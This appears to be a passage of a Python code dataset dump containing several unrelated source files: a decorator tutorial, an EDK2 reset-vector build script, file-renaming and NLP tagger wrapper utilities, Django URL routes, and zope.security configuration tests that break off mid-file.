id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
172192 | """
Tema: Funciones decoradoras.
Curso: Curso de python, video 74.
Plataforma: Youtube.
Profesor: <NAME> - Pildoras informaticas.
Alumno: @edinsonrequena.
"""
def funcion_decoradora(funcion_como_parametro):
def funcion_interior(*args, **kwargs):
print('Codigo que se ejecutara antes de llamar a la funcion a decorar')
funcion_como_parametro(*args, **kwargs)
print('Codigo que se ejecutara despues de llamar a la funcion a decorar')
return funcion_interior
@funcion_decoradora
def suma(num1, num2, num3): print(num1+num2+num3)
def resta(num1, num2): print(num1-num2)
@funcion_decoradora
def division(num1, num2): print(num1/num2)
@funcion_decoradora
def potencia(base, exponente): print(pow(base,exponente))
if __name__ == '__main__':
suma(5,10,16)
resta(8,6)
potencia(base=5, exponente=10)
division(5,7) | StarcoderdataPython |
8120849 | ## @file
# Automate the process of building the various reset vector types
#
# Copyright (c) 2009 - 2021, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
import os
import subprocess
import sys
PAGE_TABLE_2M = 'PageTable2M'
PAGE_TABLE_1G = 'PageTable1G'
FILE_FORMAT = '.raw'
ALL_RAW_FORMAT = '*' + FILE_FORMAT
IA32 = 'IA32'
X64 = 'X64'
# Pre-Define a Macros for Page Table
PAGE_TABLES = {
PAGE_TABLE_2M : "PAGE_TABLE_2M",
PAGE_TABLE_1G : "PAGE_TABLE_1G"
}
def RunCommand(commandLine):
return subprocess.call(commandLine)
# Check for all raw binaries and delete them
for root, dirs, files in os.walk('Bin'):
for file in files:
if file.endswith(FILE_FORMAT):
os.remove(os.path.join(root, file))
for arch in ('ia32', 'x64'):
for debugType in (None, 'port80', 'serial'):
for pageTable in PAGE_TABLES.keys():
ret = True
if arch.lower() == X64.lower():
directory = os.path.join('Bin', X64, pageTable)
else:
directory = os.path.join('Bin', IA32)
# output raw binary name with arch type
fileName = 'ResetVector' + '.' + arch
if debugType is not None:
fileName += '.' + debugType
fileName += FILE_FORMAT
output = os.path.join(directory, fileName)
# if the directory not exists then create it
if not os.path.isdir(directory):
os.makedirs(directory)
# Prepare the command to execute the nasmb
commandLine = (
'nasm',
'-D', 'ARCH_%s' % arch.upper(),
'-D', 'DEBUG_%s' % str(debugType).upper(),
'-D', PAGE_TABLES[pageTable].upper(),
'-o', output,
'Vtf0.nasmb',
)
print(f"Command : {' '.join(commandLine)}")
try:
ret = RunCommand(commandLine)
except FileNotFoundError:
print("NASM not found")
except:
pass
if ret != 0:
print(f"something went wrong while executing {commandLine[-1]}")
sys.exit()
print('\tASM\t' + output)
commandLine = (
'python',
'Tools/FixupForRawSection.py',
output,
)
print('\tFIXUP\t' + output)
ret = RunCommand(commandLine)
if ret != 0: sys.exit(ret)
| StarcoderdataPython |
11358694 | """
Rename TOPS-20 filespecs to regular files without version number
"""
from os import listdir, rename
import os.path
import re
SOURCEPATH = "10_7_mon/ctls"
tops20File = re.compile("(.*\.\w\w\w)(\.\d)")
files = listdir(SOURCEPATH)
pairs = []
for f in files:
m = tops20File.match(f)
if m:
p = ( f, m.groups()[0])
pairs.append(p)
for p in pairs:
original = os.path.join(SOURCEPATH, p[0])
nou = os.path.join(SOURCEPATH, p[1])
os.rename(original, nou)
| StarcoderdataPython |
5102828 | <filename>entrega5.py
# Variables con planteamiento del problema
edad = 18
inc_satisfaccion_por_helado = (edad/100)
satisfaccion_inicial = edad/100
dinero_inicial = 2000
precio_helado_inicial = 100
inc_precio_helado = 20/100
satisfaccion_minima = 85/100
satisfaccion_maxima = 100/100
# Comer helados hasta llegar a la satisfacción mínima
# o hasta quedarnos sin dinero
satisfaccion_actual = satisfaccion_inicial
dinero_actual = dinero_inicial
precio_helado_actual = precio_helado_inicial
helados_consumidos = 0
print("Satisfacción inicial ", satisfaccion_inicial*100)
print()
while ((satisfaccion_actual<satisfaccion_minima) and
((satisfaccion_actual+inc_satisfaccion_por_helado) <=
satisfaccion_maxima) and
((dinero_actual-precio_helado_actual)>0)):
# Comer un helado
helados_consumidos = helados_consumidos + 1
# Recalcular satisfacción actual
satisfaccion_actual = (satisfaccion_actual +
inc_satisfaccion_por_helado)
# Recalcular el dinero que me queda
dinero_actual = dinero_actual - precio_helado_actual
# Visualizar datos
print("ITERACION ACTUAL " , helados_consumidos)
print("* Helados consumidos ", helados_consumidos)
print("* Precio helado ", precio_helado_actual)
print("* Dinero que nos queda ", dinero_actual)
print("* Satisfacción ", satisfaccion_actual*100)
print("------")
print()
# Actualizar el precio del helado
precio_helado_actual = (precio_helado_actual *
(1+inc_precio_helado))
if(helados_consumidos<=0):
print("No me he podido comer ningún helado :-(")
# Visualizar datos
print("* Helados TOTALES consumidos ", helados_consumidos)
print("* Dinero TOTAL que me queda ", dinero_actual)
print("* Satisfacción CONSEGUIDA", satisfaccion_actual*100) | StarcoderdataPython |
249050 | <reponame>cheshire3/cheshire3
from __future__ import absolute_import
import os
import re
from subprocess import Popen, PIPE
from cheshire3.baseObjects import DocumentFactory
from cheshire3.document import StringDocument
from cheshire3.utils import getFirstData, elementType, getShellResult
from cheshire3.exceptions import ConfigFileException
class TsujiiObject:
pipe = None
tokenizer = None
_possiblePaths = {
'executablePath': {
'docs': ("Path to the tagger executable's directory, as must"
"be run from there.")},
'executable': {
'docs': 'Name of executable'
}
}
def __init__(self, session, node, parent):
o = os.getcwd()
tp = self.get_path(session, 'executablePath')
if tp:
os.chdir(tp)
exe = self.get_path(session, 'executable', './tagger')
self.pipe = Popen(exe, shell=True, bufsize=1,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
os.chdir(o)
def tag(self, session, data, xml=0):
all = []
paras = myTokenizer.split_paragraphs(data)
for p in paras:
sents = myTokenizer.split_sentences(p)
for s in sents:
try:
self.pipe.stdin.write(s)
except UnicodeEncodeError:
self.pipe.stdin.write(s.encode('utf-8'))
self.pipe.stdin.write("\n")
self.pipe.stdin.flush()
tagd = self.pipe.stdout.readline()
if xml:
tagd = self.toxml(tagd)
all.append(tagd)
return all
def toxml(self, data):
wds = data.split()
xml = []
for w in wds:
t = w.split('/')
xml.append('<t p="%s">%s</t>' % (t[1], t[0]))
return " ".join(xml)
class EnjuObject:
pipe = None
tokenizer = None
_possiblePaths = {
'executablePath': {
'docs': "Path to enju executable."
},
'executable': {
'docs': 'Name of executable'
}
}
_possibleSettings = {
'xml': {
'docs': 'Should return XML form (1, default) or text (0)',
'type': int,
'options': '0|1'
}
}
def __init__(self, session, node, parent):
tp = self.get_path(session, 'executablePath', '')
exe = self.get_path(session, 'executable', 'enju')
if not tp:
tp = getShellResult('which %s' % exe)
tp = tp if not tp.startswith('which:') else exe
else:
tp = os.path.join(tp, exe)
xml = self.get_setting(session, 'xml', 1)
if xml:
cmd = "%s -xml" % tp
else:
cmd = tp
self.pipe = Popen(cmd, shell=True, bufsize=1,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
l = ""
while l != 'Ready\n':
# Check for errors with command
if "command not found" in l:
self.log_error(session,
"Error while initializing EnjuObject: "
"{0}".format(l.strip()))
break
l = self.pipe.stderr.readline()
def tag(self, session, data, xml=0):
s = data.strip()
if not s:
return ""
try:
self.pipe.stdin.write(s)
except UnicodeEncodeError:
self.pipe.stdin.write(s.encode('utf-8'))
self.pipe.stdin.write("\n")
self.pipe.stdin.flush()
tagd = self.pipe.stdout.readline()
return tagd
class GeniaObject:
pipe = None
tokenizer = None
_possiblePaths = {
'executablePath': {
'docs': "Path to geniatagger executable."},
'executable': {
'docs': 'Name of executable'
}
}
_possibleSettings = {
'parseOutput': {
'docs': ("If 0 (default), then the output from the object will "
"be the lines from genia, otherwise it will interpret "
"back to word/POS"),
'type': int,
'options': "0|1"
},
'tokenize': {
'docs': '',
'type': int,
'options': '0|1'
}
}
def __init__(self, session, node, parent):
self.unparsedOutput = self.get_setting(session, 'parseOutput', 0)
tp = self.get_path(session, 'executablePath', '')
exe = self.get_path(session, 'executable', 'geniatagger')
if not tp:
tp = getShellResult('which %s' % exe)
tp = os.path.dirname(tp)
tpe = os.path.join(tp, exe)
if not tp:
raise ConfigFileException("%s requires the path: "
"executablePath" % self.id)
o = os.getcwd()
os.chdir(tp)
if self.get_setting(session, 'tokenize', 0):
cmd = exe
else:
cmd = "%s -nt" % exe
self.pipe = Popen(cmd, shell=True, bufsize=1,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
l = ""
while l != 'loading named_entity_models..done.\n':
l = self.pipe.stderr.readline()
os.chdir(o)
def tag(self, session, data, xml=0):
words = []
s = data.strip()
if not s:
return []
try:
self.pipe.stdin.write(s)
except UnicodeEncodeError:
self.pipe.stdin.write(s.encode('utf-8'))
self.pipe.stdin.write("\n")
self.pipe.stdin.flush()
tagline = ""
while 1:
tagline = self.pipe.stdout.readline()
tagline = tagline.decode('utf-8')
if tagline == "\n":
break
elif tagline.isspace():
continue
else:
if self.unparsedOutput:
words.append(tagline)
else:
(word, stem, type, type2, ner) = tagline[:-1].split('\t')
words.append({'text': word,
'stem': stem,
'pos': type,
'phr': type2})
return words
| StarcoderdataPython |
4887048 | from pdip.cqrs.decorators import requestclass
@requestclass
class CreateDataIntegrationConnectionQueueRequest:
TopicName: str = None
| StarcoderdataPython |
1700850 | from django.conf.urls import url
from django.conf.urls import patterns
from rest_framework.urlpatterns import format_suffix_patterns
from observations.api.views import MeasurementList
urlpatterns = patterns(
'',
url(r'^measurements/$', MeasurementList.as_view(),
name="observations_api_measurements"),
)
urlpatterns = format_suffix_patterns(urlpatterns)
| StarcoderdataPython |
3573352 | ##############################################################################
#
# Copyright (c) 2012 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test ZCML directives
"""
import unittest
from zope.security.interfaces import PUBLIC_PERMISSION_NAME as zope_Public
class Test_dottedName(unittest.TestCase):
def _callFUT(self, obj):
from zope.security.metaconfigure import dottedName
return dottedName(obj)
def test_dottted_name_w_None(self):
self.assertEqual(self._callFUT(None), 'None')
def test_dottted_name_w_class(self):
self.assertEqual(self._callFUT(Test_dottedName),
'zope.security.tests.test_metaconfigure.' +
'Test_dottedName')
class ClassDirectiveTests(unittest.TestCase):
def _getTargetClass(self):
from zope.security.metaconfigure import ClassDirective
return ClassDirective
def _makeOne(self, _context, class_):
return self._getTargetClass()(_context, class_)
#def test_ctor_non_class(self): TODO needs better guard in __init__
def test_implements_empty(self):
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.implements(context, [])
self.assertEqual(len(context._actions), 0)
def test_implements_single_interface(self):
from zope.component.interface import provideInterface
from zope.interface import Interface
from zope.interface import classImplements
class IFoo(Interface):
pass
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.implements(context, [IFoo])
self.assertEqual(len(context._actions), 2)
self.assertEqual(context._actions[0]['discriminator'][:2],
('ContentDirective', Foo, )) #3rd is object()
self.assertTrue(context._actions[0]['callable'] is classImplements)
self.assertEqual(context._actions[0]['args'], (Foo, IFoo))
self.assertTrue(context._actions[1]['discriminator'] is None)
self.assertTrue(context._actions[1]['callable'] is provideInterface)
self.assertEqual(context._actions[1]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
def test_implements_multiple_interfaces(self):
from zope.component.interface import provideInterface
from zope.interface import Interface
from zope.interface import classImplements
class IFoo(Interface):
pass
class IBar(Interface):
pass
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.implements(context, [IFoo, IBar])
self.assertEqual(len(context._actions), 4)
self.assertEqual(context._actions[0]['discriminator'][:2],
('ContentDirective', Foo, )) #3rd is object()
self.assertTrue(context._actions[0]['callable'] is classImplements)
self.assertEqual(context._actions[0]['args'], (Foo, IFoo))
self.assertTrue(context._actions[1]['discriminator'] is None)
self.assertTrue(context._actions[1]['callable'] is provideInterface)
self.assertEqual(context._actions[1]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
self.assertEqual(context._actions[2]['discriminator'][:2],
('ContentDirective', Foo, )) #3rd is object()
self.assertTrue(context._actions[2]['callable'] is classImplements)
self.assertEqual(context._actions[2]['args'], (Foo, IBar))
self.assertTrue(context._actions[3]['discriminator'] is None)
self.assertTrue(context._actions[3]['callable'] is provideInterface)
self.assertEqual(context._actions[3]['args'],
('zope.security.tests.test_metaconfigure.IBar', IBar))
def test_require_only_like_class(self):
from zope.security.protectclass import protectLikeUnto
class Bar(object):
pass
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, like_class=Bar)
self.assertEqual(len(context._actions), 1)
self.assertEqual(context._actions[0]['discriminator'][:2],
('mimic', Foo, )) #3rd is object()
self.assertTrue(context._actions[0]['callable'] is protectLikeUnto)
self.assertEqual(context._actions[0]['args'], (Foo, Bar))
def test_require_only_permission(self):
from zope.configuration.exceptions import ConfigurationError
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
self.assertRaises(ConfigurationError,
directive.require, context, permission='testing')
def test_require_no_like_class_wo_permission(self):
from zope.configuration.exceptions import ConfigurationError
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
self.assertRaises(ConfigurationError,
directive.require, context, attributes=('foo', 'bar'))
def test_require_w_single_interface(self):
from zope.component.interface import provideInterface
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.protectclass import protectName
class IFoo(Interface):
bar = Attribute("Bar")
baz = Attribute("Baz")
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, permission='testing', interface=[IFoo])
self.assertEqual(len(context._actions), 3)
self.assertEqual(context._actions[0]['discriminator'],
('protectName', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectName)
self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
self.assertEqual(context._actions[1]['discriminator'],
('protectName', Foo, 'baz'))
self.assertTrue(context._actions[1]['callable'] is protectName)
self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))
self.assertTrue(context._actions[2]['discriminator'] is None)
self.assertTrue(context._actions[2]['callable'] is provideInterface)
self.assertEqual(context._actions[2]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
def test_require_w_multiple_interfaces(self):
from zope.component.interface import provideInterface
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.protectclass import protectName
class IFoo(Interface):
bar = Attribute("Bar")
class IBar(Interface):
baz = Attribute("Baz")
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, permission='testing', interface=[IFoo, IBar])
self.assertEqual(len(context._actions), 4)
self.assertEqual(context._actions[0]['discriminator'],
('protectName', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectName)
self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
self.assertTrue(context._actions[1]['discriminator'] is None)
self.assertTrue(context._actions[1]['callable'] is provideInterface)
self.assertEqual(context._actions[1]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
self.assertEqual(context._actions[2]['discriminator'],
('protectName', Foo, 'baz'))
self.assertTrue(context._actions[2]['callable'] is protectName)
self.assertEqual(context._actions[2]['args'], (Foo, 'baz', 'testing'))
self.assertTrue(context._actions[3]['discriminator'] is None)
self.assertTrue(context._actions[3]['callable'] is provideInterface)
self.assertEqual(context._actions[3]['args'],
('zope.security.tests.test_metaconfigure.IBar', IBar))
def test_require_w_attributes(self):
from zope.security.protectclass import protectName
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, permission='testing',
attributes=['bar', 'baz'])
self.assertEqual(len(context._actions), 2)
self.assertEqual(context._actions[0]['discriminator'],
('protectName', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectName)
self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
self.assertEqual(context._actions[1]['discriminator'],
('protectName', Foo, 'baz'))
self.assertTrue(context._actions[1]['callable'] is protectName)
self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))
def test_require_w_set_attributes(self):
from zope.security.protectclass import protectSetAttribute
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, permission='testing',
set_attributes=['bar', 'baz'])
self.assertEqual(len(context._actions), 2)
self.assertEqual(context._actions[0]['discriminator'],
('protectSetAttribute', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectSetAttribute)
self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
self.assertEqual(context._actions[1]['discriminator'],
('protectSetAttribute', Foo, 'baz'))
self.assertTrue(context._actions[1]['callable'] is protectSetAttribute)
self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))
def test_require_w_set_schema_normal_fields(self):
from zope.component.interface import provideInterface
from zope.schema import Field
from zope.interface import Interface
from zope.security.protectclass import protectSetAttribute
class IFoo(Interface):
bar = Field(u"Bar")
baz = Field(u"Baz")
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, permission='testing', set_schema=[IFoo])
self.assertEqual(len(context._actions), 3)
self.assertEqual(context._actions[0]['discriminator'],
('protectSetAttribute', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectSetAttribute)
self.assertEqual(context._actions[0]['args'], (Foo, 'bar', 'testing'))
self.assertEqual(context._actions[1]['discriminator'],
('protectSetAttribute', Foo, 'baz'))
self.assertTrue(context._actions[1]['callable'] is protectSetAttribute)
self.assertEqual(context._actions[1]['args'], (Foo, 'baz', 'testing'))
self.assertTrue(context._actions[2]['discriminator'] is None)
self.assertTrue(context._actions[2]['callable'] is provideInterface)
self.assertEqual(context._actions[2]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
def test_require_w_set_schema_ignores_non_fields(self):
from zope.component.interface import provideInterface
from zope.interface import Attribute
from zope.interface import Interface
class IFoo(Interface):
bar = Attribute("Bar")
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, permission='testing', set_schema=[IFoo])
self.assertEqual(len(context._actions), 1)
self.assertTrue(context._actions[0]['discriminator'] is None)
self.assertTrue(context._actions[0]['callable'] is provideInterface)
self.assertEqual(context._actions[0]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
def test_require_w_set_schema_ignores_readonly_fields(self):
from zope.component.interface import provideInterface
from zope.schema import Field
from zope.interface import Interface
class IFoo(Interface):
bar = Field(u"Bar", readonly=True)
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.require(context, permission='testing', set_schema=[IFoo])
self.assertEqual(len(context._actions), 1)
self.assertTrue(context._actions[0]['discriminator'] is None)
self.assertTrue(context._actions[0]['callable'] is provideInterface)
self.assertEqual(context._actions[0]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
def test_allow_no_attributes_or_interface(self):
from zope.configuration.exceptions import ConfigurationError
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
self.assertRaises(ConfigurationError, directive.allow, context)
def test_allow_w_single_interface(self):
from zope.component.interface import provideInterface
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.protectclass import protectName
class IFoo(Interface):
bar = Attribute("Bar")
baz = Attribute("Baz")
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.allow(context, interface=[IFoo])
self.assertEqual(len(context._actions), 3)
self.assertEqual(context._actions[0]['discriminator'],
('protectName', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectName)
self.assertEqual(context._actions[0]['args'],
(Foo, 'bar', zope_Public))
self.assertEqual(context._actions[1]['discriminator'],
('protectName', Foo, 'baz'))
self.assertTrue(context._actions[1]['callable'] is protectName)
self.assertEqual(context._actions[1]['args'],
(Foo, 'baz', zope_Public))
self.assertTrue(context._actions[2]['discriminator'] is None)
self.assertTrue(context._actions[2]['callable'] is provideInterface)
self.assertEqual(context._actions[2]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
def test_allow_w_multiple_interfaces(self):
from zope.component.interface import provideInterface
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.protectclass import protectName
class IFoo(Interface):
bar = Attribute("Bar")
class IBar(Interface):
baz = Attribute("Baz")
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.allow(context, interface=[IFoo, IBar])
self.assertEqual(len(context._actions), 4)
self.assertEqual(context._actions[0]['discriminator'],
('protectName', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectName)
self.assertEqual(context._actions[0]['args'],
(Foo, 'bar', zope_Public))
self.assertTrue(context._actions[1]['discriminator'] is None)
self.assertTrue(context._actions[1]['callable'] is provideInterface)
self.assertEqual(context._actions[1]['args'],
('zope.security.tests.test_metaconfigure.IFoo', IFoo))
self.assertEqual(context._actions[2]['discriminator'],
('protectName', Foo, 'baz'))
self.assertTrue(context._actions[2]['callable'] is protectName)
self.assertEqual(context._actions[2]['args'],
(Foo, 'baz', zope_Public))
self.assertTrue(context._actions[3]['discriminator'] is None)
self.assertTrue(context._actions[3]['callable'] is provideInterface)
self.assertEqual(context._actions[3]['args'],
('zope.security.tests.test_metaconfigure.IBar', IBar))
def test_allow_w_attributes(self):
from zope.security.protectclass import protectName
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
directive.allow(context, attributes=['bar', 'baz'])
self.assertEqual(len(context._actions), 2)
self.assertEqual(context._actions[0]['discriminator'],
('protectName', Foo, 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectName)
self.assertEqual(context._actions[0]['args'],
(Foo, 'bar', zope_Public))
self.assertEqual(context._actions[1]['discriminator'],
('protectName', Foo, 'baz'))
self.assertTrue(context._actions[1]['callable'] is protectName)
self.assertEqual(context._actions[1]['args'],
(Foo, 'baz', zope_Public))
def test___call__(self):
context = DummyZCMLContext()
directive = self._makeOne(context, Foo)
self.assertEqual(directive(), ())
def test_factory_wo_explicit_id(self):
from zope.component.interfaces import IFactory
from zope.component.interface import provideInterface
from zope.component.zcml import handler
context = DummyZCMLContext()
context.info = 'INFO'
directive = self._makeOne(context, Foo)
directive.factory(context, title='TITLE', description='DESCRIPTION')
self.assertEqual(len(context._actions), 2)
self.assertEqual(context._actions[0]['discriminator'],
('utility', IFactory,
'zope.security.tests.test_metaconfigure.Foo'))
self.assertTrue(context._actions[0]['callable'] is handler)
args = context._actions[0]['args']
self.assertEqual(args[0], 'registerUtility')
factory = args[1]
self.assertEqual(factory._callable, Foo)
self.assertEqual(factory.title, 'TITLE')
self.assertEqual(factory.description, 'DESCRIPTION')
self.assertEqual(args[2], IFactory)
self.assertEqual(args[3], 'zope.security.tests.test_metaconfigure.Foo')
self.assertEqual(args[4], 'INFO')
self.assertTrue(context._actions[1]['discriminator'] is None)
self.assertTrue(context._actions[1]['callable'] is provideInterface)
self.assertEqual(context._actions[1]['args'], ('', IFactory))
def test_factory_w_explicit_id(self):
from zope.component.interfaces import IFactory
from zope.component.interface import provideInterface
from zope.component.zcml import handler
context = DummyZCMLContext()
context.info = 'INFO'
directive = self._makeOne(context, Foo)
directive.factory(context, id='test_id')
self.assertEqual(len(context._actions), 2)
self.assertEqual(context._actions[0]['discriminator'],
('utility', IFactory, 'test_id'))
self.assertTrue(context._actions[0]['callable'] is handler)
args = context._actions[0]['args']
self.assertEqual(args[0], 'registerUtility')
factory = args[1]
self.assertEqual(factory._callable, Foo)
self.assertEqual(args[2], IFactory)
self.assertEqual(args[3], 'test_id')
self.assertEqual(args[4], 'INFO')
self.assertTrue(context._actions[1]['discriminator'] is None)
self.assertTrue(context._actions[1]['callable'] is provideInterface)
self.assertEqual(context._actions[1]['args'], ('', IFactory))
class Foo(object):
pass
class Test_protectModule(unittest.TestCase):
def setUp(self):
from zope.security.checker import _clear
_clear()
def tearDown(self):
from zope.security.checker import _clear
_clear()
def _callFUT(self, module, name, permission):
from zope.security.metaconfigure import protectModule
return protectModule(module, name, permission)
def test_check_wo_existing_module_checker(self):
from zope.security import tests as module
from zope.security.checker import _checkers
perm = object()
self._callFUT(module, 'name', perm)
checker = _checkers[module]
self.assertTrue(checker.get_permissions['name'] is perm)
def test_check_w_existing_module_checker_zope_Public(self):
from zope.security import tests as module
from zope.security.checker import Checker
from zope.security.checker import CheckerPublic
from zope.security.checker import _checkers
before = _checkers[module] = Checker({'other': CheckerPublic})
self._callFUT(module, 'name', zope_Public)
checker = _checkers[module]
self.assertTrue(checker is before)
self.assertTrue(checker.get_permissions['name'] is CheckerPublic)
class Test_allow(unittest.TestCase):
def setUp(self):
from zope.security.checker import _clear
_clear()
def tearDown(self):
from zope.security.checker import _clear
_clear()
def _callFUT(self, context, attributes=None, interface=None):
from zope.security.metaconfigure import allow
if interface is None:
if attributes is None:
return allow(context)
return allow(context, attributes)
if attributes is None:
return allow(context, interface=interface)
return allow(context, attributes, interface)
def test_empty(self):
context = DummyZCMLContext()
self._callFUT(context)
self.assertEqual(len(context._actions), 0)
def test_w_attributes(self):
from zope.security.metaconfigure import protectModule
ATTRS = ['foo', 'bar']
context = DummyZCMLContext()
context.module = 'testing'
self._callFUT(context, ATTRS)
self.assertEqual(len(context._actions), len(ATTRS))
self.assertEqual(context._actions[0]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'foo'))
self.assertTrue(context._actions[0]['callable'] is protectModule)
self.assertEqual(context._actions[0]['args'],
('testing', 'foo', zope_Public))
self.assertEqual(context._actions[1]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'bar'))
self.assertTrue(context._actions[1]['callable'] is protectModule)
self.assertEqual(context._actions[1]['args'],
('testing', 'bar', zope_Public))
def test_w_interface(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.metaconfigure import protectModule
class IFoo(Interface):
bar = Attribute('Bar')
context = DummyZCMLContext()
context.module = 'testing'
self._callFUT(context, interface=[IFoo])
self.assertEqual(len(context._actions), 1)
self.assertEqual(context._actions[0]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectModule)
self.assertEqual(context._actions[0]['args'],
('testing', 'bar', zope_Public))
def test_w_both(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.metaconfigure import protectModule
class IFoo(Interface):
bar = Attribute('Bar')
baz = Attribute('Baz')
ATTRS = ['foo', 'bar']
context = DummyZCMLContext()
context.module = 'testing'
self._callFUT(context, ATTRS, [IFoo])
self.assertEqual(len(context._actions), 3)
self.assertEqual(context._actions[0]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'foo'))
self.assertTrue(context._actions[0]['callable'] is protectModule)
self.assertEqual(context._actions[0]['args'],
('testing', 'foo', zope_Public))
self.assertEqual(context._actions[1]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'bar'))
self.assertTrue(context._actions[1]['callable'] is protectModule)
self.assertEqual(context._actions[1]['args'],
('testing', 'bar', zope_Public))
self.assertEqual(context._actions[2]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'baz'))
self.assertTrue(context._actions[2]['callable'] is protectModule)
self.assertEqual(context._actions[2]['args'],
('testing', 'baz', zope_Public))
class Test_requre(unittest.TestCase):
def setUp(self):
from zope.security.checker import _clear
_clear()
def tearDown(self):
from zope.security.checker import _clear
_clear()
def _callFUT(self, context, permission, attributes=None, interface=None):
from zope.security.metaconfigure import require
if interface is None:
if attributes is None:
return require(context, permission)
return require(context, permission, attributes)
if attributes is None:
return require(context, permission, interface=interface)
return require(context, permission, attributes, interface)
def test_empty(self):
context = DummyZCMLContext()
context.module = 'testing'
perm = object()
self._callFUT(context, perm)
self.assertEqual(len(context._actions), 0)
def test_w_attributes(self):
from zope.security.metaconfigure import protectModule
ATTRS = ['foo', 'bar']
context = DummyZCMLContext()
context.module = 'testing'
perm = object()
self._callFUT(context, perm, ATTRS)
self.assertEqual(len(context._actions), len(ATTRS))
self.assertEqual(context._actions[0]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'foo'))
self.assertTrue(context._actions[0]['callable'] is protectModule)
self.assertEqual(context._actions[0]['args'],
('testing', 'foo', perm))
self.assertEqual(context._actions[1]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'bar'))
self.assertTrue(context._actions[1]['callable'] is protectModule)
self.assertEqual(context._actions[1]['args'],
('testing', 'bar', perm))
def test_w_interface(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.metaconfigure import protectModule
class IFoo(Interface):
bar = Attribute('Bar')
context = DummyZCMLContext()
context.module = 'testing'
perm = object()
self._callFUT(context, perm, interface=[IFoo])
self.assertEqual(len(context._actions), 1)
self.assertEqual(context._actions[0]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'bar'))
self.assertTrue(context._actions[0]['callable'] is protectModule)
self.assertEqual(context._actions[0]['args'],
('testing', 'bar', perm))
def test_w_both(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.security.metaconfigure import protectModule
class IFoo(Interface):
bar = Attribute('Bar')
baz = Attribute('Baz')
ATTRS = ['foo', 'bar']
context = DummyZCMLContext()
context.module = 'testing'
perm = object()
self._callFUT(context, perm, ATTRS, [IFoo])
self.assertEqual(len(context._actions), 3)
self.assertEqual(context._actions[0]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'foo'))
self.assertTrue(context._actions[0]['callable'] is protectModule)
self.assertEqual(context._actions[0]['args'],
('testing', 'foo', perm))
self.assertEqual(context._actions[1]['discriminator'],
